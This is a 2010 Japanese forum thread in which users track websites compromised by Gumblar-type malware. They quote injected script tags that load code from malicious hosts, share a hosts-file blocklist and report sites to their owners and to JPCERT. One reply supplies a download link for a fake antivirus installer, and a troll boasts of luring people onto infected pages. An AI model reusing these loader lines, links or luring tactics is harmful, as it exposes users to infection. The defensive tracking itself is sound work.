>written by IDK ←管理人

■8月2日(祝!再改竄)
darkside●higashino●jp/ms●cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1280752626
>『やられた』
>警告は出てないし心当たりはないしで困ってます。
>といいつつ実は心当たりあるので対策してみます。具体的内容については、攻撃者に情報を与えないため伏せておきます。
>written by IDK ←管理人

■8月13日(祝!再々改竄ww)
>>119を参照

■8月14日
Google先生に「このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。」の称号を授与されました
www.google.com/safebrowsing/diagnostic?site=darkside●higashino●jp&hl=ja


笑いすぎて腹痛えwwwwww
124名無しさん@お腹いっぱい。:2010/08/16(月) 23:15:26
トレンドマイクロオンラインスキャンをしたらJaneStyleのdatが2つMal_Gumblarに感染とのこと
削除をしたらインターネットの方は軽快になったもののこれって見つけて削除をすれば問題のないウィルスですか?
125名無しさん@お腹いっぱい。:2010/08/18(水) 11:57:58
そうね
126名無しさん@お腹いっぱい。:2010/08/19(木) 01:03:06
>>124
専ブラなら誤検出なだけだろ
127名無しさん@お腹いっぱい。:2010/08/19(木) 10:03:06
>>124が快適になったって言ってるんだからいいじゃん!!
128名無しさん@お腹いっぱい。:2010/08/19(木) 23:43:20
それにしても「jsきってりゃおkおk」って、
街歩くためにいちいちボディガードで周り固めればいいじゃんって言ってるようなもんだよな
java使うページも昨今増えてるのに「javaきればおk」って不便さを顧みない思考停止寸前モノとしか……
129名無しさん@お腹いっぱい。:2010/08/20(金) 00:11:21
なんか最後の行で話が変わってるけどJava使ってるサイトそんなに増えてる?
130コテハン ◆8080adndqg :2010/08/20(金) 00:15:44
【陥落サイトのURL悪用厳禁】
calliy●com/

関西大学なぎなた部
s1●shard●jp/kunagi
Gumblarっぽいのが混ざってるような気が・・

--本日の目玉商品--
【このサイトはコンピュータに損害を与える可能性があります。】
企業コンサルティング、ラジオ番組制作、ECサイト運営、WEB制作の株式会社エントランス。
www●en-trance●co●jp/

■セーフ ブラウジング 診断結果
www.google.com/safebrowsing/diagnostic?site=www●en-trance●co●jp/&hl=ja
>疑わしいサイトとして認識されています。>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
131名無しさん@お腹いっぱい。:2010/08/20(金) 00:18:44
>>129
JAVAとJAVAScriptの違いもわからんバカはスルーしろよw
132名無しさん@お腹いっぱい。:2010/08/20(金) 00:39:23
猛暑で頭沸騰してるのが居るなw
contents-edu●mind●meiji●ac●jp
>fucked by U#0h4x0r Blog:www.noahacker.com fuck jps all killer in the war !
※8080系に陥落
133名無しさん@お腹いっぱい。:2010/08/20(金) 18:28:36
今gradの調子おかしくね?
134名無しさん@お腹いっぱい。:2010/08/20(金) 18:29:45
間違えたgredだ
135名無しさん@お腹いっぱい。:2010/08/21(土) 02:25:32
今北産業

>>130の内、残ってる分。
> kunagi
大学にメルポ
> en-trance
AC_RunActiveContent●jsに別のがあったのでWhoisからメルポ
136夷塚 ◆y0JEaK6O/gDf :2010/08/21(土) 15:49:23
>>130
s1●shard●jp/kunagi
 →jsunpack.jeek.org/dec/go?report=a812e039d6e8c23954264744097626222a6d00dc
137コテハン ◆8080adndqg :2010/08/21(土) 18:57:10
>>135-136 乙乙

【陥落サイトのURL悪用厳禁】
CODE1(なつかしー)+8080(現行型)+一番下はガンブラコ・・なのか?
www●simpleds●biz/
138コテハン ◆8080adndqg :2010/08/21(土) 19:05:02
>137追記
jsunpack.jeek.org/dec/go?report=bc5e43cdd9bff71b13258346a81d439ac14ae5b8
139コテハン ◆8080adndqg :2010/08/22(日) 22:00:21
【陥落サイトのURL悪用厳禁】
新ガンブラ子なのか?
<8080のコード><!--「32桁の英数字」--><script src=http://〜中略〜.php ></script>

www●yenisehirliyiz●biz
danraf●by●ru
hiero●expo●ru ←改竄祭開催中(危)
※他にもたくさんある

■検索わーど
".ru/" ".js></script><--" "--><script src=" ".php ></script>"

■日本のサイトも陥落してるっぽい
detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1445102614

あと、コード一行だけってコレかな?
roseplaceseniorassistedliving●com
140名無しさん@お腹いっぱい。:2010/08/23(月) 21:21:23
www●eudora-jp●com

</HTML>
<script type="text/javascript" src="http://riotassistance●ru/Template●js"></script>
<!--68a2c5dd53f8db2f85dd899d63a960bb-->

コンテンツはオン・ザ・エッヂ当時のままっぽいが、よくわかんない奴の手に落ちてる?
141名無しさん@お腹いっぱい。:2010/08/24(火) 21:03:57
www●golf●ne●jp/guest/compe/Play_EachDisp●asp?PID=1
142名無しさん@お腹いっぱい。:2010/08/25(水) 00:28:19
いちおう貼っておく
■DLLのロード方法を狙う新たな攻撃手法〜マイクロソフトがアドバイザリ公開
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2327

■マイクロソフト セキュリティ アドバイザリ (2269637)
http://www.microsoft.com/japan/technet/security/advisory/2269637.mspx
143コテハン ◆8080adndqg :2010/08/25(水) 18:10:48
【陥落サイトのURL悪用厳禁】
www●baloghlaszlo●hu/

nuttypiano●com/〜●js
どっとこむ・・
144コテハン ◆8080adndqg :2010/08/25(水) 20:35:06
【陥落サイトのURL悪用厳禁】
関東学生アメリカンフットボール連盟公式ホームページ
kcfa●jp/ ←再改竄
>Last-Modified: Wed, 25 Aug 2010 03:26:52 GMT

nuttypiano●com/は、まだ検索に引っ掛からん・・
145名無しさん@お腹いっぱい。:2010/08/25(水) 22:33:51
http://wwwyoutube●zz●tc/watchvSUUqke6rxWs

Gumblar?
146名無しさん@お腹いっぱい。:2010/08/26(木) 00:38:22
>>145
ここは鑑定スレではありません
147名無しさん@お腹いっぱい。:2010/08/26(木) 00:38:45
>>144
祝!\(^o^)/再改竄
148名無しさん@お腹いっぱい。:2010/08/26(木) 14:45:29
>>144
niftyにつーほー

前回もniftyにつーほーして受領されたんだけどねぇ。。。
149コテハン ◆8080adndqg :2010/08/27(金) 14:32:43
【陥落サイトのURL悪用厳禁】
www16●atpages●jp/akimonomm/businessstory/
www●curry-ousama●co●jp/i/ ※電話用
150名無しさん@お腹いっぱい。:2010/08/27(金) 19:40:36
>>145
仮想PCが重くなった よってGumblar確定
151コテハン ◆8080adndqg :2010/08/27(金) 20:05:47
【陥落サイトのURL悪用厳禁】
「禿.js」装填中のweb屋
・ホームページ開発,受託,請負,Web開発,システム開発【フィールドシステム】
www●fieldsystem●ne●jp/blog/entvw_0000000001●aspx

<meta name="description" CONTENT="フィールドシステムからのお知らせです。<script src=http://www●wangqiao365●com/img/yahoo●js></script>">

www.google.com/safebrowsing/diagnostic?site=www●fieldsystem●ne●jp/&hl=ja
廃業しろよwwww
152名無しさん@お腹いっぱい。:2010/08/27(金) 20:30:14
>>151
同意w
153名無しさん@お腹いっぱい。:2010/08/27(金) 21:23:47
>>151
これはw
154名無しさん@お腹いっぱい。:2010/08/27(金) 23:40:37
今北産(ry

乙乙

>>149
上:@PAGESにつーほー。
下:削除されたみたい。

>>151
So-netにつーほー。
155名無しさん@お腹いっぱい。:2010/08/28(土) 01:49:58
フィールドシステム
\(^o^)/オワタ
156名無しさん@お腹いっぱい。:2010/08/28(土) 18:45:05
顔文字は「ついったー」で暴れとる?
@housoukomachi
@gyudon_sukiya
@meiji_fan

ついったーにつーほーしたら面白い事になるかもしれんw
※日本のザルな法律じゃなくて、アメリカンな法律で裁かれる
157名無しさん@お腹いっぱい。:2010/08/30(月) 09:13:39
hostsファイルにガンブラーの感染源サイトを明記しておけばある程度防げると思うんだがなぁ
0.0.0.0 cc●wzxyq●com
って感じでゴリゴリと
C:\Windows\System32\drivers\etcフォルダ内のhostsファイルね
158名無しさん@お腹いっぱい。:2010/08/30(月) 09:28:27
それとrd.or.tpはrd.or.tlにURLが変わったまま403の模様
159名無しさん@お腹いっぱい。:2010/08/30(月) 09:55:45
0.0.0.0 www●rctank●jp
0.0.0.0 rctank●jp
0.0.0.0 wzxyq●com
0.0.0.0 cc●wzxyq●com
0.0.0.0 googleads●g●doubleclick●net
0.0.0.0 g●doubleclick●net
0.0.0.0 doubleclick●net
0.0.0.0 nuttypiano●com
0.0.0.0 riotassistance●ru
0.0.0.0 roseplaceseniorassistedliving●com
0.0.0.0 jsunpack●jeek●org
0.0.0.0 jeek●org
0.0.0.0 parkperson●ru
0.0.0.0 www●parkperson●ru
0.0.0.0 pantscow●ru
0.0.0.0 www●pantscow●ru
0.0.0.0 60●42●255●33
0.0.0.0 118●21●192●131
0.0.0.0 118●21●197●41
0.0.0.0 218●43●251●37
0.0.0.0 210●190●162●5
0.0.0.0 118●23●168●15
0.0.0.0 122●1●246●94
0.0.0.0 221●184●27●254
0.0.0.0 163●139●130●150
0.0.0.0 163●139●124●135
0.0.0.0 203●152●213●250
0.0.0.0 www14●atpages●jp
0.0.0.0 www●wangqiao365●com
0.0.0.0 wangqiao365●com
こんな感じで書いておけば気休めにはなるかもしれない
160名無しさん@お腹いっぱい。:2010/08/30(月) 10:19:30
過去レスにもあったけどhosts明記してる人は結構いるよ
161名無しさん@お腹いっぱい。:2010/08/30(月) 11:20:43
取扱注意
sumori●jp
162名無しさん@お腹いっぱい。:2010/08/30(月) 11:25:29
<script type="text/javascript" src="http://youngarea●ru/Network●js"></script>
これだな
163名無しさん@お腹いっぱい。:2010/08/30(月) 12:57:49
>>161
電凸完了
164163:2010/08/30(月) 14:30:28
あんの〜〜スモリさん?
index.phpのコードは光速で消えたけど
jsの中に残ってるコードはどうすんのよ?(苦笑)

電話だけではわからないみたいだから
問い合わせフォームから再凸

■IPA(情報処理推進機構)
ttp://www.ipa.go.jp/
▼(3)ウェブサイト改ざんの被害発生時の対処
ttp://www.ipa.go.jp/security/txt/2010/04outline.html
■インシデント報告の届出(JPCERT/CC)
ttps://www.jpcert.or.jp/form/
■so-netセキュリティ通信
ttp://www.so-net.ne.jp/security/index.html
▼「ガンブラー」「サイト改ざん」めぐる基本のQ&A
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html
▼サイト改ざん猛威:感染パソコンの修復は「OSの再インストール」が近道
ttp://www.so-net.ne.jp/security/news/library/2166.html

これだけ添付しておけばきっとわかってくれr(ry
165名無しさん@お腹いっぱい。:2010/08/30(月) 14:53:11
>>164
WHOISからめるぽ。
さくらにもつーほーすたお。
166名無しさん@お腹いっぱい。:2010/08/30(月) 18:34:37
spam ; 終わらないサイトの改竄
ttp://slashdot.jp/~LARTH/journal/514123

岡山はんこ広場
www.hanko-okayama●jp
→nuttypiano●com/E-mail.js (いつもの)

こんなページが設置されていたり。
www.hanko-okayama●jp/where34.html
→www.drugsad●com (薬屋さん)
→nakulan.co●in/_vti_script/h-clearance.php (いつもの)
167名無しさん@お腹いっぱい。:2010/08/30(月) 19:24:05
>>166
〜34.htmlにGumblarっぽいのが寄生してるなw
168名無しさん@お腹いっぱい。:2010/08/31(火) 11:42:26 BE:2340096285-2BP(0)
ウイルススキャンしたら80個物の感染jsファイルがあってワロス
幸い削除できたから一安心出来ない
169名無しさん@お腹いっぱい。:2010/08/31(火) 11:48:13
ヒント:誤検出
170名無しさん@お腹いっぱい。:2010/08/31(火) 12:00:58 BE:1872076984-2BP(0)
だとええなぁ avastだからなぁ
171名無しさん@お腹いっぱい。:2010/08/31(火) 16:00:26
取扱注意
www●keiolax●com
172名無しさん@お腹いっぱい。:2010/08/31(火) 17:44:48
92.243.84.187.addr.datapoint.ru Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
h ttp://うちのサイト/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=

↑が存在しないディレクトリに直接やって来ていた
tiny_mce改竄系か
173名無しさん@お腹いっぱい。:2010/08/31(火) 17:46:03
174名無しさん@お腹いっぱい。:2010/09/01(水) 05:52:38
直リンすんなカス 死ねや
175名無しさん@お腹いっぱい。:2010/09/01(水) 18:49:15
>>151
無害とは言え、今現在もコードが残ったままとは・・
フィールドシステム完璧にオワタww
176名無しさん@お腹いっぱい。:2010/09/03(金) 11:00:30
取扱注意
file●asobube●com/sansyoku/index●html

マグロと一緒にウィルスも食わされるとは…!
177夷塚 ◆y0JEaK6O/gDf :2010/09/03(金) 14:19:11
>>176
だれうまw
メル凸済み
178名無しさん@お腹いっぱい。:2010/09/03(金) 16:15:54
rockmansbible○hp○infoseek○co○jp

Trojan:JS/Redirector.DC検出
179名無しさん@お腹いっぱい。:2010/09/03(金) 18:57:04
>>176 つまんね お前はサーモンでも食ってろボケ
180名無しさん@お腹いっぱい。:2010/09/03(金) 19:01:14
>>178 </HTML>の下だな 暗号化されてる部分のC=M("〜");を復号化すると
/google●com/mininova●org/youdao●com●phpになるな
181名無しさん@お腹いっぱい。:2010/09/03(金) 19:50:21
>>177
ttp://sucuri.net/malware/entry/MW:SIPRO:1
注:玄人向け

参照
MW:JS:151
MW:JS:152
182名無しさん@お腹いっぱい。:2010/09/03(金) 20:51:39
>>178
"Trojan:JS/Redirector.DC"という事はMSEか やばいね
183名無しさん@お腹いっぱい。:2010/09/03(金) 21:16:30
え?
184名無しさん@お腹いっぱい。:2010/09/04(土) 00:52:16
>>2,3の対策しててもWebシールド機能無しのセキュリティソフトじゃ防げないとでも言いたいのでは
185名無しさん@お腹いっぱい。:2010/09/04(土) 19:10:17
>>180 だから何
186名無しさん@お腹いっぱい。:2010/09/04(土) 22:14:14
お前の小さな脳味噌で考えれば
187名無しさん@お腹いっぱい。:2010/09/05(日) 00:21:35
system doctor 2006をダウンロードしたいのですが、まだ生き残ってますかね?
どなたかplz
188名無しさん@お腹いっぱい。:2010/09/05(日) 00:44:25
>>187

ttp://web.archive.org/web/20070117074533/http://cdn.downloadcontrol.com/files/installers/SystemDoctor2006FreeInstall_jp.exe
自己責任でな 元々サイトが死んでるから実行出来るかはシラネ
189名無しさん@お腹いっぱい。:2010/09/05(日) 16:11:50
>>188 リンク切れでした・・・
 偽アンチウイルスソフトでダウンロードできるとこって何かないですか?
 
190名無しさん@お腹いっぱい。:2010/09/05(日) 16:20:02
191名無しさん@お腹いっぱい。:2010/09/05(日) 16:40:14
>>190 できた。ありがとう。
 これでアンチウイルスの性能評価できる。
192名無しさん@お腹いっぱい。:2010/09/05(日) 23:27:13
最近のガンブラーって感染すると偽物セキュリティー入れてくるだけ?
それとも情報盗まれる?
193名無しさん@お腹いっぱい。:2010/09/05(日) 23:37:45
>>192
試してみるのオヌヌメ
194名無しさん@お腹いっぱい。:2010/09/06(月) 00:04:39
>>193
試せたらここで聞いてないわw
195名無しさん@お腹いっぱい。:2010/09/06(月) 10:46:28
ホントに最近不毛な返しが多いな……
「PCすてれば」とか「ためせば」とか「javaきればおkおk」とか
相手にガブガブする奴も多いし
196コテハン ◆8080adndqg :2010/09/06(月) 14:08:00
【陥落サイトのURL悪用厳禁】
ueno-syoten●com/

>>195
荒れるのは「仕様」なので我慢して下さい
197名無しさん@お腹いっぱい。:2010/09/06(月) 22:38:03
www5●ocn●ne●jp/~kobadent/
www16●ocn●ne●jp/~moyogi/
www31●ocn●ne●jp/~jbc/
www4●ocn●ne●jp/~minorisk/
www8●ocn●ne●jp/~iyashiro/
www18●ocn●ne●jp/~serec/ <Gumblar.X>
198名無しさん@お腹いっぱい。:2010/09/07(火) 20:45:08
>>192
感染後の流れはここの「第3段階」のところ
今でも変わってないと思う
blog.trendmicro.co.jp/archives/3340

冗談ではなく、何が行なわれるかは実際に感染しないと分からん
PCが乗っ取られるので、攻撃者のやりたい放題状態になる
199名無しさん@お腹いっぱい。:2010/09/07(火) 22:04:08
>>198
なるほど、情報サンクス
200コテハン ◆8080adndqg :2010/09/07(火) 22:50:09
【陥落サイトのURL悪用厳禁】
8080(旧型)
www●kireibast●sakura●ne●jp/〜

ttp://search.yahoo.co.jp/search?p=site%3Awww●kireibast●sakura●ne●jp&aq=-1&oq=&ei=UTF-8&fr=sfp_as&x=wrt
>約2,310件

たぶんGumblar.x
sugimotokairo●net/index●h

その他(下段は改竄祭り絶賛開催中)
www6●atpages●jp/ryumazin
istanbulyelken●com/iyk/templates_c/index1●html
201名無しさん@お腹いっぱい。:2010/09/09(木) 08:10:55
bigkaden2010net.shop-pro●jp/
202コテハン ◆8080adndqg :2010/09/09(木) 17:16:41
【陥落サイトのURL悪用厳禁】
www●mspinjapan●com/
203コテハン ◆8080adndqg :2010/09/09(木) 17:49:14
【陥落サイトのURL悪用厳禁】
www●foresto-ne●com/
204名無しさん@お腹いっぱい。:2010/09/09(木) 18:01:17
Adobe Reader、Acrobatに新たなゼロデイ攻撃
ttp://internet.watch.impress.co.jp/docs/news/20100909_392583.html
205(VдV) ◆yUyb3Tqn92 :2010/09/09(木) 20:12:33
悪用厳禁とか書いてるやつマジわりー野郎だなニヒヒヒ
(VдV)いい加減俺様みたいなのが悪用するのわかって貼ってるだろ
206名無しさん@お腹いっぱい。:2010/09/09(木) 20:25:44
お前が悪用してもたかがしれてるわ
207(VдV) ◆yUyb3Tqn92 :2010/09/09(木) 20:50:23
と、俺様の煽りに早速馬鹿が釣れたわい
こういう反応を高みの見物するの好き(VдV)v イェィ
208名無しさん@お腹いっぱい。:2010/09/09(木) 20:53:12
何やってんだ?
早く悪用してみろよ糞ガキ
209名無しさん@お腹いっぱい。:2010/09/09(木) 21:03:41
高みの見物
意 味:物事の成り行きを、第三者として傍観すること。
210コテハン ◆8080adndqg :2010/09/09(木) 21:38:57
>>205
33323335333433353333333733323335333333393334333633323335333433313333333533323335
33343335333333373332333533333339333433313332333533333338333333343332333533343335
33333339333233353333333933343331333233353333333933343333333233353334333533333335
33323335333433313334333533323335333433323333333333323335333433353333333833323335
33333338333333303332333533333338333333353332333533343335333333343332333533343332
33333339333233353333333933333339
211名無しさん@お腹いっぱい。:2010/09/09(木) 22:21:32
取扱注意w
ruhuraro●blog57●fc2●com/
212名無しさん@お腹いっぱい。:2010/09/09(木) 22:42:21
fc2のブログもターゲットになったか
213名無しさん@お腹いっぱい。:2010/09/09(木) 22:44:05
33333333333333353333333533363331333333323336333233333333333333363333333333333335
33333335333633313333333733333339333333373333333733333333333333353333333633333331
33333335333333333333333533333337333333333333333433333333333333343333333433333337
33333337333333353333333333333335333333373333333233333335333333333333333333333337
33333333333333353333333533333339333333373333333533333335333333363333333333333335
33333333333333363333333633333331333333343333333233333333333333353333333733333331
3333333333333332333333363333333930643061
214名無しさん@お腹いっぱい。:2010/09/09(木) 23:17:01
>>212
馬鹿?
215名無しさん@お腹いっぱい。:2010/09/10(金) 00:51:01
んー8080系はドメインがだいぶ死んじゃってて検体が入手できん

> 16287 個のドメインを感染させています
www.google.com/safebrowsing/diagnostic?site=nuttypiano.com&hl=ja

だいぶ大きいけど、去年の初代Gumblar(GENO)はピーク時6万
googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html
216名無しさん@お腹いっぱい。:2010/09/10(金) 00:59:06
◆yUyb3Tqn92 これからもどんどん初心者釣ってくれ 初心者が2chに増えすぎていい加減ウザイと思ってきた頃だ
217名無しさん@お腹いっぱい。:2010/09/10(金) 13:26:37
自分で自分を応援するのか
胸が熱くなるな…
218名無しさん@お腹いっぱい。:2010/09/10(金) 16:17:26
>>217
マジキチだから仕方がないw
219 ◆xs.m./NkkNFp :2010/09/10(金) 20:49:12
古参(笑)ばかりの2chもつまらんだろうに
220(VдV) ◆yUyb3Tqn92 :2010/09/11(土) 00:29:46
おいおい俺様の話題で持ちきりだな
でも俺様にムカついちゃった奴の自演なのだろう
他の書き込みを自演と決め付けている被害妄想をしてるのがなによりの証拠だぜ
自演大好きな奴にありがちな被害妄想乙(>w<)お見通し!


(VдV)でもそんなに悔しかったら俺様のようにコテつけて堂々と書き込めばいいのにね
221(VдV) ◆yUyb3Tqn92 :2010/09/11(土) 00:32:05
いろいろな有名なサイトまでが被害に遭っているが
中には俺様が踏ませたことによって感染につながった連中もいるのだろうな

(*VдV*)でも俺様ぴんぴんしてるおw
踏ませるだけなら加害者でも被害者でもない
なので第三者同然(>w<)メシウマ爽快学会!
222(VдV) ◆yUyb3Tqn92 :2010/09/11(土) 00:35:35
ホント過疎ってるなこのスレ
先に立ったあのスレで>>1のスレ番ミスを厳しく指摘した上に死ねとまで言った効果は抜群だったか
223名無しさん@お腹いっぱい。:2010/09/11(土) 00:43:22
>>220
お前が勝ちなのは当然だろ
街中歩いてて通り魔に刺されるなんて思ってる奴いないんだから
お前に突然危険URL踏まされる奴らだって同じこと
224(VдV) ◆yUyb3Tqn92 :2010/09/11(土) 01:11:03
全然同じじゃねーだろ
ウィルスURL踏むのは踏む奴の意思で踏んでるわけだからな

(VдV)俺様はそいつが踏むように心理誘導してるだけ
ネットやってて自分がウィルスかからないと思ってURL開いてる奴がいるとしたらそいつは低脳以外何者でもねーぜ
そういう意味じゃ俺様がやってることは確かに正義と言っても過言ではないかもな。必要悪という名の正義があっても良いと思うんだ(w)
225名無しさん@お腹いっぱい。:2010/09/11(土) 01:16:16
>>224
ちなみにアンチウイルスソフトは何を使ってるの?
やっぱ情弱御用達のavast!かなw
226(VдV) ◆yUyb3Tqn92 :2010/09/11(土) 02:10:39
>>225
おいおい(>w<)
てことはお前アンチウィルスソフトに頼ってるのか?(>w<)プクーススススwwwww
お前みたいにどんなソフトを入れてればいいかどうかって考えてる時点で不合格。
情弱乙(>w<)レベル低っ!


( VдV )やっぱ俺様って論破の天才だね
227(VдV) ◆yUyb3Tqn92 :2010/09/11(土) 02:13:15
そして人をムカつかせるのが得意だな(@VдV@)←この顔文字余計ムカつくでしょーwえへへーwww
228名無しさん@お腹いっぱい。:2010/09/11(土) 02:15:57
その顔文字好きだからずっと使ってね
229名無しさん@お腹いっぱい。:2010/09/11(土) 02:18:48
スキルないくせに態度だけはでかいな糞ガキ
230(VдV) ◆yUyb3Tqn92 :2010/09/11(土) 02:20:03
(          VдV            )
231(VдV) ◆yUyb3Tqn92 :2010/09/11(土) 02:21:23
(          VдV            )
お          や     す        み
232(VдV) ◆yUyb3Tqn92 :2010/09/11(土) 02:22:22
(          VдV            )
233名無しさん@お腹いっぱい。:2010/09/11(土) 02:27:00
>>229
そうやって頭にきた素振り見せると余計顔文字喜ばせるだけだぞ
それに>>225-226は確かにお前より顔文字の方が正論だから仕方ない
234名無しさん@お腹いっぱい。:2010/09/11(土) 02:28:48
>>231
おれはお前好きだ
このスレ頭固い奴ばかりだから
またきてくれ、おやすみ
235名無しさん@お腹いっぱい。:2010/09/11(土) 02:31:00
バレバレの自演するなよ
低脳だからこれくらいが限界か
236:2010/09/11(土) 03:02:28
IDないスレで自演自演言う奴ってwwww
そんなに必死になるならIDあるスレいけよ低脳wwwww
237名無しさん@お腹いっぱい。:2010/09/11(土) 03:03:37
やべ俺まで正論言っちまったwwww
238名無しさん@お腹いっぱい。:2010/09/11(土) 07:50:35
>>232
FF14スレにも出没してたでしょ
FF14ゲーム内のgumblarってもしかしてあなた?
239名無しさん@お腹いっぱい。:2010/09/11(土) 08:01:53
ID無くてもなんかわかっちゃうな…
エスパー養成講座みたいだ
240名無しさん@お腹いっぱい。:2010/09/11(土) 11:06:56
『馬鹿の一つ覚え』
意 味:愚かな者は一つの事だけを覚え、それをどんな場合にも得意になって持ち出す。
同じ事を何度も繰り返して言う人を皮肉った言葉。

顔文字のためにあるような諺(ことわざ)だなw
241名無しさん@お腹いっぱい。:2010/09/11(土) 11:07:18
なぜセキュ板は自分の考えと違う者に排他的な人が多いのか
242名無しさん@お腹いっぱい。:2010/09/11(土) 11:10:38
240 :名無しさん@お腹いっぱい。:2010/09/11(土) 11:06:56
『馬鹿の一つ覚え』
意 味:愚かな者は一つの事だけを覚え、それをどんな場合にも得意になって持ち出す。
同じ事を何度も繰り返して言う人を皮肉った言葉。

顔文字のためにあるような諺(ことわざ)だなw

241 :名無しさん@お腹いっぱい。:2010/09/11(土) 11:07:18
なぜセキュ板は自分の考えと違う者に排他的な人が多いのか






顔文字にコケにされて悔しいのはわかるが
自演下手すぎ^^;せめて一分以上は時間あけようぜ
あw残念ながら俺はお前が戦ってる顔文字じゃないからね!悪いが^^
243名無しさん@お腹いっぱい。:2010/09/11(土) 13:36:14
あれをコケにしてやったと思ってるのか
244 ◆jvtzoP47MMGU :2010/09/11(土) 17:03:00
構ってちゃんに構うお前らもどうかと思うけど(;^_^)
なんで無視できないでレス返すんだろ(;^_^)
245名無しさん@お腹いっぱい。:2010/09/11(土) 17:05:46
iswebが終了すると聞いて
自分のサイトの別館があるgeocitiesのファイルマネージャを1年ぶりくらいに開いたら
スクリプトタグが大量に書き込まれていて広告ページが勝手に作られていた
これはもうだめかね
246名無しさん@お腹いっぱい。:2010/09/11(土) 19:16:04
iswebww
おまえわおれか。

10月に追い出されるよー、めんどくさいよー。
247名無しさん@お腹いっぱい。:2010/09/12(日) 12:43:09
本家のWebGetterって今死んでますよね?
248名無しさん@お腹いっぱい。:2010/09/12(日) 18:07:33
"Canadian Pharmacy" domains
ttp://www.mywot.com/en/forum/7508--canadian-pharmacy-domains?comment-43426

.ru 多すぎだろw
249名無しさん@お腹いっぱい。:2010/09/12(日) 18:27:01
誰かリスト作ってくれないかな
250名無しさん@お腹いっぱい。:2010/09/12(日) 18:58:50
言い出しっぺの法則
251名無しさん@お腹いっぱい。:2010/09/12(日) 19:10:26
言いだしっぺは今期も知識もないヘタレの法則
252名無しさん@お腹いっぱい。:2010/09/12(日) 19:41:29
>>249
WOT入れろよ
253名無しさん@お腹いっぱい。:2010/09/13(月) 13:59:18
新ドメインきたー
scarystroke●ru/●●●●.js
254名無しさん@お腹いっぱい。:2010/09/13(月) 23:21:16
>>249
まあ「自分だけが本質を解っている」妄想がここまで強いともう矯正不可能だろうね
255名無しさん@お腹いっぱい。:2010/09/14(火) 00:53:32
ホームページに関する報告とお詫び
ttp://www.sumori.jp/news/index.php?e=81

McAfee SiteAdvisor
ttp://siteadvisor.jp/sites/sumori.jp/postid?p=5162331

改竄されてたことを正直に書かないのに「正直な家造り」ですか・・
256名無しさん@お腹いっぱい。:2010/09/14(火) 01:15:32
SANSPO.COM
日本に「報復」!中国ハッカー組織が攻撃宣言
http://www.sanspo.com/shakai/news/100913/sha1009132256024-n1.htm

攻撃増えるらしい
257名無しさん@お腹いっぱい。:2010/09/14(火) 23:51:41
「Flash Player」にゼロデイ攻撃--「Adobe Reader」と「Acrobat」にも影響
ttp://japan.cnet.com/sp/zeroday/story/0,3800105600,20419956,00.htm

またおまえ(Adobe)か!
258名無しさん@お腹いっぱい。:2010/09/14(火) 23:57:12
BADbe…
259名無しさん@お腹いっぱい。:2010/09/15(水) 09:50:30
しかもこれ再来週まで治らないだと?ふざけんじゃねえよ・・・
ニコニコも一時閉鎖するくらいしないとダメじゃねえか?
260名無しさん@お腹いっぱい。:2010/09/15(水) 16:23:55
アドベの社員は全員毒殺銃殺絞首刑に処すべき
261名無しさん@お腹いっぱい。:2010/09/16(木) 00:15:41
>>260
それだと脆弱性放置になってしまうから
社員全員24時間勤務(休憩無し・メシ抜き)で最速対応のほうが…

今後ゼロデイが発覚したら社員全員尻叩き1万発
※重役の尻叩きの様子はようつべで公開
262名無しさん@お腹いっぱい。:2010/09/16(木) 07:31:10
まあニコニコで騒ぎになってないなら大丈夫だろ
263名無しさん@お腹いっぱい。:2010/09/16(木) 07:39:42
この場合、危険なのは動画サイトだけ?
それとも動画サイト以外もこのゼロデイの対象なのかな
264名無しさん@お腹いっぱい。:2010/09/16(木) 07:52:25
なんで動画サイト限定なんだよ
Flash全てだよ
265名無しさん@お腹いっぱい。:2010/09/16(木) 09:06:07
ハッカーが仕組んだ動画やFlashのページに行っただけでアウトっぽいな
こっちで先に読みこんじゃってるからなぁ
266 ◆DNq5bDQQkRSz :2010/09/16(木) 09:50:53
>>261 結局社員が過労死する訳か
267名無しさん@お腹いっぱい。:2010/09/16(木) 13:52:17
>>265
俺はFirefox+Stop Autoplayに避難した
268名無しさん@お腹いっぱい。:2010/09/16(木) 14:11:01
まぁYouTube見るだけならHTML5対応ブラウザで
ttp://www.youtube.com/html5
で有効にすりゃFlash使わんで済むな
269名無しさん@お腹いっぱい。:2010/09/16(木) 18:11:20
gnashに変えた。
いつも見てるページは問題ないみたいだからこのまま行こうかな。
270名無しさん@お腹いっぱい。:2010/09/17(金) 12:37:30
俺はエロページの新規探索をしないことにした
271名無しさん@お腹いっぱい。:2010/09/17(金) 13:28:39
>>269
グナッシュ重くね?動画だけでなく普通のFlashもクソ重いんだけど
ただアドベのタダメシ喰らい共には二度と世話に
なりたくない点では迷いなく同意だが
272名無しさん@お腹いっぱい。:2010/09/19(日) 16:20:16
Security Advisory for Flash Player
http://www.adobe.com/support/security/advisories/apsa10-03.html

Adobe Flash Playerは米国時間9月20日にリリース
Google Chrome内蔵Flashは10.1.85.3に本日更新済み
273名無しさん@お腹いっぱい。:2010/09/19(日) 18:35:01
やっとかよ
274名無しさん@お腹いっぱい。:2010/09/20(月) 18:08:25
10月とか言ってなかったっけ
まあいいけど
275名無しさん@お腹いっぱい。:2010/09/20(月) 18:16:25
10月はAdobeReader(Acrobat)
276名無しさん@お腹いっぱい。:2010/09/20(月) 20:09:55
褒める価値もない これくらいやるのは企業として当然の義務
277名無しさん@お腹いっぱい。:2010/09/21(火) 04:03:40
Flash Player 10.1.85.3 キタ!
278名無しさん@お腹いっぱい。:2010/09/21(火) 07:14:16
今更かよ何やってたんだこのクズ企業
279名無しさん@お腹いっぱい。:2010/09/21(火) 09:38:47
クズ起業のソフト使わないといけない奴もクズなんだよな
280名無しさん@お腹いっぱい。:2010/09/21(火) 11:17:30
流れ的に見て
>>205の影響で最近URL貼るの自重してるんだな
新しいの見つけたので貼ろうと思ったが自重しとく
281名無しさん@お腹いっぱい。:2010/09/21(火) 11:29:06
凸してる側の俺としては、報告はありがたいのだが。
282名無しさん@お腹いっぱい。:2010/09/21(火) 13:15:34
